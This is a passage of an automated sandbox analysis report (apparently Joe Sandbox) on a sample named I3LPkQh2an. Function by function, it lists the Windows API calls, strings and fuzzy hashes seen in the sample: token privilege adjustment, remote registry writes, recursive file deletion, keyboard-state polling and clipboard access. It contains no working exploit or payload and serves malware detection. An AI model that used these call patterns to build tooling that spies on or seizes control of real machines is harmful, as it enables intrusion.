Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9

Function 00458310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865

_memset.LIBCMT ref: 00458353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
CloseHandle.KERNEL32(?), ref: 004583B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
GetProcessWindowStation.USER32 ref: 004583E6
SetProcessWindowStation.USER32(00000000), ref: 004583F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A

Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2

Strings

, xrefs: 00458362
default, xrefs: 00458405
winsta0, xrefs: 004583C8

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 7dea4d1740e8310f6dcdee35c9cc839430f3e6273a811ccccba986a615d76668
Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
Opcode Fuzzy Hash: 7dea4d1740e8310f6dcdee35c9cc839430f3e6273a811ccccba986a615d76668
Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28

Function 0046C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
FindClose.KERNEL32(00000000), ref: 0046C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
__swprintf.LIBCMT ref: 0046C890
__swprintf.LIBCMT ref: 0046C8D3

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

__swprintf.LIBCMT ref: 0046C927

Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1

__swprintf.LIBCMT ref: 0046C975

Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B

__swprintf.LIBCMT ref: 0046C9C4
__swprintf.LIBCMT ref: 0046CA13
__swprintf.LIBCMT ref: 0046CA62

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0046C88A
%4d, xrefs: 0046C8CD
%02d, xrefs: 0046C91B, 0046C925, 0046C973, 0046C9C2, 0046CA11, 0046CA60

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 511509d096d8a85c851f2d3f16a46ec9b1aa2dd11cc0fa5b5634bac435d16de7
Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
Opcode Fuzzy Hash: 511509d096d8a85c851f2d3f16a46ec9b1aa2dd11cc0fa5b5634bac435d16de7
Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66

Function 0046EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046EFB6
_wcscmp.LIBCMT ref: 0046EFCB
_wcscmp.LIBCMT ref: 0046EFE2
GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
FindClose.KERNEL32(00000000), ref: 0046F031
FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
_wcscmp.LIBCMT ref: 0046F074
_wcscmp.LIBCMT ref: 0046F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
FindClose.KERNEL32(00000000), ref: 0046F0D2
FindClose.KERNEL32(00000000), ref: 0046F0E4

Strings

*.*, xrefs: 0046F048

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E

Function 00480857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
RegCloseKey.ADVAPI32(?), ref: 00480DB2
RegCloseKey.ADVAPI32(00000000), ref: 00480DBF

Strings

REG_EXPAND_SZ, xrefs: 00480A2F
REG_DWORD, xrefs: 00480C83
REG_BINARY, xrefs: 00480D4D
REG_MULTI_SZ, xrefs: 00480B7A
REG_QWORD, xrefs: 00480D00
REG_SZ, xrefs: 00480AD0

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 8f227258a0dab7c0859dbc81476a8b1bf560c483aaf7810dacbfdfc85d42ebac
Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
Opcode Fuzzy Hash: 8f227258a0dab7c0859dbc81476a8b1bf560c483aaf7810dacbfdfc85d42ebac
Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89

Function 004166E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON

Download Yara Rule

Strings

0DJ, xrefs: 00416733
CR), xrefs: 00451287
NO_START_OPT), xrefs: 0045114F
UTF16), xrefs: 004510CF
0EJ, xrefs: 0041673D
0FJ, xrefs: 00416747
CRLF), xrefs: 004512C1
ANYCRLF), xrefs: 004512FB
LIMIT_MATCH=, xrefs: 00451170
ANY), xrefs: 004512DE
pGJ, xrefs: 00416751
BSR_UNICODE), xrefs: 00451338
NO_AUTO_POSSESS), xrefs: 0045112E
LF), xrefs: 004512A4
LIMIT_RECURSION=, xrefs: 004511FC
UCP), xrefs: 0045110D
3cA, xrefs: 004168FF
UTF), xrefs: 004510FA
BSR_ANYCRLF), xrefs: 0045131E
_A, xrefs: 00451465, 0045150C, 004515B4

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
API String ID: 0-559809668
Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98

Function 0046F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046F113
_wcscmp.LIBCMT ref: 0046F128
_wcscmp.LIBCMT ref: 0046F13F

Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0

FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
FindClose.KERNEL32(00000000), ref: 0046F179
FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
_wcscmp.LIBCMT ref: 0046F1BC
_wcscmp.LIBCMT ref: 0046F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
FindClose.KERNEL32(00000000), ref: 0046F21A
FindClose.KERNEL32(00000000), ref: 0046F22C

Strings

*.*, xrefs: 0046F190

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
Instruction ID: 359f8111c83e04d014ff149dee767818393646aa3285bf91305061d844a33625
Opcode Fuzzy Hash: 5e4c1ca136502ca1550e0c7352cbc5842e7fcfe98f56b9ff86b85f6952a77760
Instruction Fuzzy Hash: 1031C3365001196ADF10AEA4FC54AEE77AC9F45360F2005BBE844A2190EA39DE89CA6D

Function 0046A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
__swprintf.LIBCMT ref: 0046A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
_memset.LIBCMT ref: 0046A2B2
_wcsncpy.LIBCMT ref: 0046A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
CloseHandle.KERNEL32(00000000), ref: 0046A32E
RemoveDirectoryW.KERNEL32(?), ref: 0046A337
CloseHandle.KERNEL32(00000000), ref: 0046A341

Strings

\??\%s, xrefs: 0046A22B
\, xrefs: 0046A247
:, xrefs: 0046A252

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29

Function 0046001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00460097
SetKeyboardState.USER32(?), ref: 00460102
GetAsyncKeyState.USER32(000000A0), ref: 00460122
GetKeyState.USER32(000000A0), ref: 00460139
GetAsyncKeyState.USER32(000000A1), ref: 00460168
GetKeyState.USER32(000000A1), ref: 00460179
GetAsyncKeyState.USER32(00000011), ref: 004601A5
GetKeyState.USER32(00000011), ref: 004601B3
GetAsyncKeyState.USER32(00000012), ref: 004601DC
GetKeyState.USER32(00000012), ref: 004601EA
GetAsyncKeyState.USER32(0000005B), ref: 00460213
GetKeyState.USER32(0000005B), ref: 00460221

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B

Function 004803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
RegCloseKey.ADVAPI32(00000000), ref: 0048082F

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: c21a4a07d85489fa2b475113d27af1da06aad6be12126d572a2106395dc058cb
Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
Opcode Fuzzy Hash: c21a4a07d85489fa2b475113d27af1da06aad6be12126d572a2106395dc058cb
Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56

Function 00474164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0047418B
EmptyClipboard.USER32 ref: 00474191
GlobalAlloc.KERNEL32(00000002,?), ref: 004741A6
CloseClipboard.USER32 ref: 00474245

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D

Function 004637EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770

Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32

FindFirstFileW.KERNEL32(?,?), ref: 004638A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0046394B
MoveFileW.KERNEL32(?,?), ref: 0046395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0046397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 0046399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 004639B9

Strings

\*.*, xrefs: 0046384E, 00463857, 0046386C

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: e41a741f13836c122e1a93b35399af2899a1ae988daff58317c02930b9991c4e
Instruction ID: 5f3270bf9419f81a9c4f0e0ab399985bb250d256c3569b2459e2ec67edc6ab47
Opcode Fuzzy Hash: e41a741f13836c122e1a93b35399af2899a1ae988daff58317c02930b9991c4e
Instruction Fuzzy Hash: 5551717180514CAACF05EFA1C9929EEB778AF14319F60047EE40277191EB396F0DCB5A

Function 0046F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
Sleep.KERNEL32(0000000A), ref: 0046F470
_wcscmp.LIBCMT ref: 0046F484
_wcscmp.LIBCMT ref: 0046F49F
FindNextFileW.KERNEL32(?,?), ref: 0046F53D
FindClose.KERNEL32(00000000), ref: 0046F553

Strings

*.*, xrefs: 0046F425

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: b21b5751c67d20c7492c03ab1b01f4f28f86a4b8690f8ee467c0eb4bada205d6
Instruction ID: 52678bcd3f78e7a2dee1500e624958e336d76892905c76040bb4fc6126c74c58
Opcode Fuzzy Hash: b21b5751c67d20c7492c03ab1b01f4f28f86a4b8690f8ee467c0eb4bada205d6
Instruction Fuzzy Hash: D0418D71904219AFCF10EF64DC45AEFBBB4FF04314F50446BE855A2291EB38AE88CB59

Function 00413030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

3cA, xrefs: 00413225
_A, xrefs: 00413322

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
